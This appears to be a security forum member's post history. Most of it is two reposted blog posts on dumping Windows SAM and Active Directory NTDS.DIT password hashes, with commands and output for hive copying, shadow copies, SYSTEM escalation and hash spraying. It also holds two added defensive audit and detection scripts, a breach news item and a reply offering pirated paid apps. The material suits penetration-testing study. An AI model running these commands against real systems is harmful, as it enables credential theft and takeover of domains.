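The same Log On As check can be scripted for an audit. The sketch below is an added example, not code from the original post or from any tool it mentions: it parses saved `sc.exe qc` output and lists every service whose account password Windows has to keep in an `_SC_<service>` secret. The sample output, the host name SRV01, the domain CORP and all account names are constructed assumptions.

```python
import re

# Identities that need no stored password; Windows keeps no _SC_ secret for them.
BUILTIN = {"localsystem", "nt authority\\system",
           "nt authority\\localservice", "nt authority\\local service",
           "nt authority\\networkservice", "nt authority\\network service"}
FIELD = re.compile(r"^\s*([A-Z_]+)\s*:\s*(.*)$")
RANK = {"critical": 0, "high": 1, "medium": 2}

# Constructed sample of abbreviated `sc.exe qc` output; accounts are made up.
SAMPLE = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Spooler
        BINARY_PATH_NAME   : C:\Windows\System32\spoolsv.exe
        SERVICE_START_NAME : LocalSystem

SERVICE_NAME: postgresql-9.0
        SERVICE_START_NAME : .\postgres

SERVICE_NAME: DB2
        SERVICE_START_NAME : .\db2admin

SERVICE_NAME: BackupAgent
        SERVICE_START_NAME : CORP\svc_backup
"""


def parse_sc_qc(text):
    """Split concatenated `sc.exe qc` output into one dict per service."""
    services = []
    for line in text.splitlines():
        m = FIELD.match(line)
        if not m:
            continue
        key, value = m.group(1), m.group(2).strip()
        if key == "SERVICE_NAME":
            services.append({key: value})
        elif services:
            services[-1][key] = value
    return services


def classify(start_name, hostname):
    """Return 'builtin', 'local' or 'domain' for a SERVICE_START_NAME value."""
    name = start_name.strip().lower()
    if name in BUILTIN or name.startswith("nt service\\"):
        return "builtin"
    if "@" in name:  # UPN form, user@domain
        return "domain"
    prefix, sep, _user = name.rpartition("\\")
    if not sep or prefix in (".", hostname.lower()):
        return "local"
    return "domain"


def audit(text, hostname, privileged=()):
    """List services whose account password sits in LSA secrets, worst first."""
    privileged = {p.lower() for p in privileged}
    findings = []
    for svc in parse_sc_qc(text):
        account = svc.get("SERVICE_START_NAME", "")
        kind = classify(account, hostname)
        if not account or kind == "builtin":
            continue
        severity = ("critical" if account.lower() in privileged
                    else "high" if kind == "domain" else "medium")
        findings.append({"service": svc["SERVICE_NAME"], "account": account,
                         "kind": kind, "severity": severity,
                         "secret": "_SC_" + svc["SERVICE_NAME"]})
    return sorted(findings, key=lambda f: RANK[f["severity"]])

for f in audit(SAMPLE, "SRV01"):
    print(f["severity"], f["service"], f["account"], f["secret"])
```

Passing the members of privileged groups as `privileged` raises matching services to critical, which is the domain administrator case the post warns about.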
-
@Play4Fun01: you're right about the OS ... that's where iOS gets its "speed" from! But as for rooting and the fixes, I don't understand why that bothers you ... with iOS you also have to jailbreak it to be able to enjoy it at all! @dota ... For Android I'll give you an app that lets you download any paid app from the market for free!! I don't think it gets any cheaper than that!
-
DefCamp 2011 @Iasi - regional hacking & INFOSEC conference
co4ie replied to Andrei's topic in Important announcements
ok... even though I wasn't there, I'm very curious about the challenge!!
-
Welcome ... It's good to know there are other people from Neamț among us!!
-
PM please ... the challenge would really be very interesting ...
-
Visa looks into Eastern European security breach

Visa is investigating a potential security breach that may have compromised payment cards of Eastern Europeans. Although Visa hasn't disclosed which countries were hit, the Romanian state-owned CEC Bank has blocked and reissued 17,000 cards on suspicion that they had been compromised.

CEC Bank said in a statement that "a number" of cards issued by banks both in Romania and abroad might have been compromised via an international database. Here's an excerpt from the statement, translated into English from Romanian by v3.co.uk:

Visa pinned the problem on a European payment processor and issued this statement:

In his report on this incident, v3's Phil Muncaster pointed to a warning earlier this month from Trend Micro regarding a basic design flaw in some implementations of the 3D Secure protocol - aka "Verified by Visa" and "MasterCard SecureCode" - that could allow crooks to conduct ID fraud on some Visa cards.

The potential security hole in 3DS is a result of a weakness in the password reset process of some system versions. Trend Micro's Rik Ferguson explained the flaw on his CounterMeasures blog:

He then goes on to describe the password reset link, finding that three of four pieces of information used to verify identity - cardholder name, expiration date and signature panel code - are all contained in the card itself, either embossed or printed and contained in the magnetic stripe data. The fourth piece of information, cardholder date of birth, would be drop-dead easy to track down, he says:

The Eastern Europe breach and the 3DS flaw are spelling one headache-y month for Visa so far. Yikes, now all the company needs is for the EU to contemplate carving away at its profits with big fines for privacy breaches or something like that. But wait, that's exactly what the EU is mulling!

The way the Financial Times reads it, the proposed rule, slated to be introduced in January, will impact social media most sharply, serving as a significant tool to boost the EU's powers when it comes to combating data protection breaches. But it will be interesting to see what happens (if in fact the rule doesn't get watered down to pointlessness, that is) in cases such as credit card payment breaches like the one Visa is now investigating, if it turns out that Visa or its payment processor was treating customer data with anything less than kid gloves.

Source
-
Conclusions on Windows Security Account Manager

In the previous post of this series, I briefly explained what the Windows Security Account Manager (SAM) is and how to dump Windows local users' password hashes from SAM, either having physical access to the target system or following a remote compromise of the machine, post-exploitation. Remotely, there exist three possible techniques: legacy, volume shadow copies and in-memory dump. Lastly, I highlighted the most widely used tools for the in-memory hashes dump and I collected and released them in this spread-sheet along with other tools that I will discuss later.

I want to reiterate the following concept: given file transfer ability between your machine and the target system, always prefer to copy the SAM and SECURITY files over from the target and extract the password hashes offline afterwards.

However, this safe approach to password hashes dump does not guarantee that you are going to obtain all Windows local accounts' hashes. If you suspect that this is the case, you will have to dump the hashes via in-memory dump and merge the results. Odd, but I have seen this happening quite a few times already and I am still discussing standalone Windows workstations, not part of a Windows domain.

Preferred tools

Personally, my first choice for standalone SAM hashes dump is pwdump7: it works on all Windows versions from 2000 on both 32-bit and 64-bit systems. However, this tool does not perform a real in-memory dump and could miss out hashes. I always run two or three tools to avoid this from happening: fgdump, gsecdump and PWDumpX along with pwdump7 cover both techniques across all Windows versions and architectures and, carefully launched one at a time, should not crash the LSASS process.

When I have got a Metasploit Meterpreter shell onto the system, I rely on the post-exploitation module smart_hashdump by Carlos Perez, falling back to its predecessor post-exploitation module hashdump when it fails.

Active Directory

Definition from Wikipedia:

This definition comes into play when you have compromised a system that is part of a Windows domain. In order to quickly extend your control over the whole domain, the goal is to compromise the root domain controller. If you are within a child domain, the final goal is to achieve Enterprise Domain Administrator level access onto the root domain controller of the Windows forest's parent domain.

There are plenty of resources on the Internet discussing domain escalation and this is out of the scope of this post series. A blog post that summarizes the best techniques and goes straight to the point is written by pentestmonkey.net.

Alternatively, you can pass the local users' hashes obtained from your entry point machines to keimpx and spray them against the domain controllers: if the system administrator reuses the same local Administrator password across all machines, you are in!

Regardless of how you have compromised a domain controller, preferably the root domain controller as it is the first to get updated with changes to user accounts, the important thing is that you have got an administrator (local or domain) shell onto it.

Database file NTDS.DIT

The goal now is to dump the domain users' password hashes. These are stored, along with nearly all the information that is accessible in the Active Directory (user objects, groups, membership information, etc), in a binary file, %SystemRoot%\ntds\NTDS.DIT.

This file is locked by the system. You can use the volume shadow copies technique illustrated in the previous post to copy it along with the SYSTEM file over to your machine.

Alternatively, use the ntdsutil snapshot facility introduced in Windows Server 2008. It will create a snapshot of the active directory database allowing you to copy ntds.dit and SYSTEM file. This technique is detailed in a Microsoft TechNet article.

Extract hashes from NTDS.DIT

You can use the passcape's Windows Password Recovery tool to extract hashes from ntds.dit.

Alternatively, you can use a couple of tools (ntds_dump_hash.zip) developed by Csaba Barta and documented in his paper titled Research paper about offline hash dump and forensic analysis of ntds.dit. These tools are used to:

* Extract the required data from ntds.dit: esedbdumphash.
* Decrypt the hashes and interpret other information regarding the user account: dsdump.py, dsdumphistory.py, dsuserinfo.py.

Download and compile the tool:

    wget http://csababarta.com/downloads/ntds_dump_hash.zip
    unzip ntds_dump_hash.zip
    cd libesedb
    ./configure && make

Use esedbdumphash to extract the datatable from ntds.dit:

    cd esedbtools
    ./esedbdumphash -v -t /tmp/output
    $ ls -1 /tmp/output.export/
    datatable

Use dsdump.py to dump the hashes from the datatable file using the bootkey (SYSKEY) from the SYSTEM hive:

    cd ../../creddump/
    chmod +x *.py
    ./dsuserinfo.py /tmp/output.export/datatable
    ./dsdump.py /tmp/output.export/datatable --include-locked --include-disabled > domain_hashes.txt

Like standalone machines, you can use the in-memory technique too to dump the domain users' hashes. The tools are the same and work equally. Just be cautious when injecting into the LSASS process of a domain controller: in the worst case scenario, you will have to reboot an infrastructure-critical server.

I have added these tools and improved the spread-sheet.

Source
-
Slightly modified definition from Wikipedia:

Generally, dumping operating system users' password hashes is a common action following a compromise of a machine: getting access to the password hashes might open the doors to a variety of attacks including, but not limited to, authenticating with the hash over SMB to other systems where passwords are reused, password policy analysis and pattern recognition, password cracking, etc.

Depending on the type of access that you have got to the target, you can retrieve the password hashes from SAM in different ways.

Physical access

Given physical access to the system, typically during a laptop assessment or a successful social engineering engagement, the preferred way to safely dump the password hashes is to power off the machine, enter the BIOS menu at power-on time, review the boot order to allow boot from the optical drive and USB drive before local hard-disk, save the settings and reboot the system with your favourite GNU/Linux live distribution CD or USB stick.

Two widely known tools to dump the local users' hashes from the SAM file, given the Windows file system block file, are bkhive and samdump2:

* bkhive - dumps the syskey bootkey from a Windows system hive.
* samdump2 - dumps Windows 2k/NT/XP/Vista password hashes.

These tools are generally included in many GNU/Linux live distributions. If they're not, make sure to bring a copy of them with you.

Usage:

    # bkhive
    bkhive 1.1.1 by Objectif Securite
    http://www.objectif-securite.ch
    original author: ncuomo@studenti.unina.it

    Usage:
    bkhive systemhive keyfile

    # samdump2
    samdump2 1.1.1 by Objectif Securite
    http://www.objectif-securite.ch
    original author: ncuomo@studenti.unina.it

    Usage:
    samdump2 samhive keyfile

Example of retrieving the SAM hashes from a Windows partition /dev/sda1:

    # mkdir -p /mnt/sda1
    # mount /dev/sda1 /mnt/sda1
    # bkhive /mnt/sda1/Windows/System32/config/SYSTEM /tmp/saved-syskey.txt
    # samdump2 /mnt/sda1/Windows/System32/config/SAM /tmp/saved-syskey.txt > /tmp/hashes.txt

In the event that you have not got bkhive or samdump2 with you, you can fall back to copying the SYSTEM and SAM files from /mnt/sda1/Windows/System32/config to your USB stick and importing them into any tool that is able to extract the SAM hashes from them: Cain & Abel, creddump and mimikatz are some available tools.

Bypass login prompt

If you are looking into bypassing the login prompt rather than dumping users' password hashes, some smart people have come up with innovative approaches:

* BootRoot is a project presented at Black Hat USA 2005 by researchers Derek Soeder and Ryan Permeh, as an exploration of technology that custom boot sector code can use to subvert the Windows kernel as it loads. The eEye BootRootKit is a boot sector-based NDIS backdoor that demonstrates the implementation of this technology.
* SysRQ2 is a bootable CD image that allows a user to open a fully privileged (SYSTEM) command prompt on Windows 2000, Windows XP, and Windows Server 2003 systems by pressing Ctrl+Shift+SysRq at any time after startup. It was first demonstrated at Black Hat USA 2005 by researchers Derek Soeder and Ryan Permeh as an example of applied eEye BootRoot technology. Use the "create CD from ISO image" feature of your preferred CD burning software to create a bootable SysRq CD.
* Kon-Boot is a prototype piece of software which allows changing the contents of a Linux kernel and Windows kernel on the fly (while booting). In the current compilation state it allows logging into a Linux system as root user without typing the correct password or elevating privileges from current user to root. For Windows systems it allows entering any password protected profile without any knowledge of the password.

Password reset

Alternatively you can boot the machine with the bootdisk live CD or USB stick and use the chntpw utility to reset any Windows local user's credentials.

Post-exploitation scenario

The typical scenario here is that you have compromised a Windows machine by any means and have got shell access as an administrative user. Firstly, you need to escalate your privileges to SYSTEM user. A simple way is to use Sysinternals' PsExec utility:

    C:\>psexec.exe -i -s cmd.exe

There are several other techniques too, but this is outside of the scope of this post.

Legacy techniques

On Windows NT and Windows 2000 systems you can use the MSbackup utility, part of the MS-DOS subsystem: backup the system state into a file locally on the machine you have compromised, then using MSbackup again, restore the system state stuff to a local directory without preserving the security. Once complete, you will have the SAM and SYSTEM files. You need about 280Mb for the initial backup - typical for a Windows 2000 with current service packs and hot fixes.

Another solution is to use regback.exe, part of the Windows 2000 Resource Kit Tools. This is slightly easier as it only dumps the specific files:

    C:\>regback.exe C:\backtemp\SAM machine sam
    C:\>regback.exe C:\backtemp\SYSTEM machine system

If you cannot get regback.exe to work, on Windows XP and above systems use regedit.exe or reg.exe.

Using reg.exe:

    C:\>reg.exe save HKLM\SAM sam
    The operation completed successfully
    C:\>reg.exe save HKLM\SYSTEM sys
    The operation completed successfully

Using regedit.exe:

* Execute regedit.exe from Start / Run prompt.
* Open up Computer\HKEY_LOCAL_MACHINE and right-click the SAM section and select Export.
* Change the Save as type setting to Registry Hive Files and save as SAM.
* Same steps with SYSTEM hive.

Lastly, you can also get the SAM and SYSTEM files from C:\Windows\repair\. However, this directory contains outdated copies of the original C:\Windows\System32\config\ files, so it might not reflect the current users' credentials.

Volume Shadow Copies technique

This technique is fairly recent and was first illustrated by Tim Tomes. It consists of abusing the Volume Shadow Copies functionality in modern Windows operating systems to access protected system files like C:\Windows\System32\config's SAM and SYSTEM.

You can use the Volume Shadow Copy Management command line interface, vssown, to leverage this technique as follows.

List shadow copies:

    C:\>cscript vssown.vbs /list
    Microsoft (R) Windows Script Host Version 5.8
    Copyright (C) Microsoft Corporation. All rights reserved.

    SHADOW COPIES
    =============

As expected, no shadow copies initially.

Verify the status of the Volume Shadow Service (VSS):

    C:\>cscript vssown.vbs /status
    Microsoft (R) Windows Script Host Version 5.8
    Copyright (C) Microsoft Corporation. All rights reserved.

    [*] Stopped

    C:\>cscript vssown.vbs /mode
    Microsoft (R) Windows Script Host Version 5.8
    Copyright (C) Microsoft Corporation. All rights reserved.

    [*] VSS service set to 'Manual' start mode.

In this case, once we are done, we need to restore it to the initial state (Stopped).

Create a new shadow copy:

    C:\>cscript vssown.vbs /create
    Microsoft (R) Windows Script Host Version 5.8
    Copyright (C) Microsoft Corporation. All rights reserved.

    [*] Attempting to create a shadow copy.

Verify that the shadow copy has been created:

    C:\>cscript vssown.vbs /list
    Microsoft (R) Windows Script Host Version 5.8
    Copyright (C) Microsoft Corporation. All rights reserved.

    SHADOW COPIES
    =============

    [*] ID: {D79A4E73-CCAB-4151-B726-55F6C5C3A853}
    [*] Client accessible: True
    [*] Count: 1
    [*] Device object: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
    [*] Differnetial: True
    [*] Exposed locally: False
    [*] Exposed name:
    [*] Exposed remotely: False
    [*] Hardware assisted: False
    [*] Imported: False
    [*] No auto release: True
    [*] Not surfaced: False
    [*] No writers: True
    [*] Originating machine: LAPTOP
    [*] Persistent: True
    [*] Plex: False
    [*] Provider ID: {B5946137-7B9F-4925-AF80-51ABD60B20D5}
    [*] Service machine: LAPTOP
    [*] Set ID: {018D7854-5A28-42AE-8B10-99138C37112F}
    [*] State: 12
    [*] Transportable: False
    [*] Volume name: \\?\Volume{46f5ef63-8cca-11e0-88ac-806e6f6e6963}\

You need to take note of the Device object value for the next step and the ID for the cleanup step.

Pull the following files from a shadow copy:

    C:\>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM .
    C:\>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM .

You have just copied over SAM and SYSTEM files from the shadow copy to the C:\ root folder.

Cleanup:

    C:\>cscript vssown.vbs /delete {D79A4E73-CCAB-4151-B726-55F6C5C3A853}
    Microsoft (R) Windows Script Host Version 5.8
    Copyright (C) Microsoft Corporation. All rights reserved.

    [*] Attempting to delete shadow copy with ID: {D79A4E73-CCAB-4151-B726-55F6C5C3A853}

Eventually, restore to original Stop status:

    C:\>cscript vssown.vbs /stop
    Microsoft (R) Windows Script Host Version 5.8
    Copyright (C) Microsoft Corporation. All rights reserved.

    [*] Signal sent to stop the VSS service.

In-memory technique

The concept behind in-memory dump of SAM hashes is to inject a DLL into the LSASS system process or, generally speaking, to parse the memory for specific patterns and inspect these memory pages' content. The former action can lead to a Blue Screen of Death (BSoD) condition following a crash of the LSASS process, therefore this action is not recommended on production environments: prefer registry hive copy (regback.exe and reg.exe/regedit.exe) and Volume Shadow Copies techniques instead. Nevertheless, in some specific instances, the in-memory technique is required.

The most widely known standalone tool to dump SAM hashes is probably fgdump, the successor of pwdump6, both tools developed by the foofus team. The main advantage of fgdump over pwdump6 is that it works on Windows Vista and later versions. However, I have seen them both failing under some circumstances. More reliable tools include pwdump7 from Andres Tarasco and gsecdump from TrueSec. The former works on both 32-bit and 64-bit systems across all versions of Windows, but has some problems when run on domain controllers, and the latter does not work on 64-bit systems, but is reliable against modern Windows operating systems including Windows Server 2008 domain controllers 32-bit. Despite not working on 64-bit systems, another popular and reliable tool is PWDumpX by Reed Arvin.

The Metasploit Framework also has its own post-exploitation modules, Meterpreter built-in command and dated Meterpreter script to dump the SAM hashes. Details on how these pieces of code work within the framework and which techniques they implement can be found on these blog posts by HD Moore.

Needless to say that there are more options and knowledge of which one to use within the target environment is important. In order to facilitate this task, I have listed the relevant tools, their capabilities, where they do work and, most importantly, where they are known to fail on this spread-sheet.

Source
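The registry hive copy and shadow copy commands in this post leave recognisable command lines in process-creation logs. The detection sketch below is an added example, not part of the original post: it matches those command lines and escalates a host once both the SYSTEM hive (which holds the boot key) and a credential store have been copied. The log format, host names, users and timestamps are constructed assumptions.

```python
import re
from collections import defaultdict

# Volume shadow copy device prefix as it appears in the post's copy commands.
SHADOW = r"\\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\d+\\"
HIVE = r"(sam|system|security)"
RULES = [
    ("reg_save", re.compile(
        r"\breg(?:\.exe)?\s+save\s+(?:hklm|hkey_local_machine)\\" + HIVE + r"\b", re.I)),
    ("regback", re.compile(
        r"\bregback(?:\.exe)?\s+\S+\s+machine\s+" + HIVE + r"\b", re.I)),
    ("shadow_copy_read", re.compile(
        SHADOW + r"\S*\\(sam|system|security|ntds\.dit)(?=\s|$)", re.I)),
    ("vss_create", re.compile(r"\bvssown\.vbs\s+/create\b", re.I)),
]

# Constructed process-creation records: timestamp | host | user | command line.
SAMPLE_LOG = r"""
2012-01-10T09:14:02Z | WS-07 | CORP\alice | reg.exe save HKLM\SAM sam
2012-01-10T09:14:09Z | WS-07 | CORP\alice | reg.exe save HKLM\SYSTEM sys
2012-01-10T09:20:41Z | DC-01 | CORP\admin | cscript vssown.vbs /create
2012-01-10T09:21:30Z | DC-01 | CORP\admin | cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM .
2012-01-10T09:25:00Z | FS-02 | CORP\bob | reg.exe save HKLM\SOFTWARE soft
2012-01-10T09:26:00Z | FS-02 | CORP\bob | regback.exe C:\backtemp\SAM machine sam
"""


def scan(lines):
    """Return one hit per matching record: (host, user, rule, hive or None)."""
    hits = []
    for line in lines:
        parts = line.strip().split(" | ", 3)
        if len(parts) != 4:
            continue  # blank or malformed record
        _ts, host, user, cmd = parts
        for name, rx in RULES:
            m = rx.search(cmd)
            if m:
                hive = m.group(1).upper() if rx.groups else None
                hits.append((host, user, name, hive))
                break
    return hits


def correlate(hits):
    """Rate each host: SYSTEM plus a credential store copied means 'high'."""
    hives = defaultdict(set)
    for host, _user, _rule, hive in hits:
        seen = hives[host]
        if hive:
            seen.add(hive)
    report = {}
    for host, seen in hives.items():
        stores = seen & {"SAM", "SECURITY", "NTDS.DIT"}
        if "SYSTEM" in seen and stores:
            report[host] = "high"
        elif seen:
            report[host] = "medium"
        else:
            report[host] = "low"  # shadow copy created, nothing read yet
    return report


if __name__ == "__main__":
    for host, level in correlate(scan(SAMPLE_LOG.splitlines())).items():
        print(host, level)
```

The regedit.exe export path described in the post is driven through the GUI and does not show up in command lines, so it needs file-creation or registry-access telemetry instead.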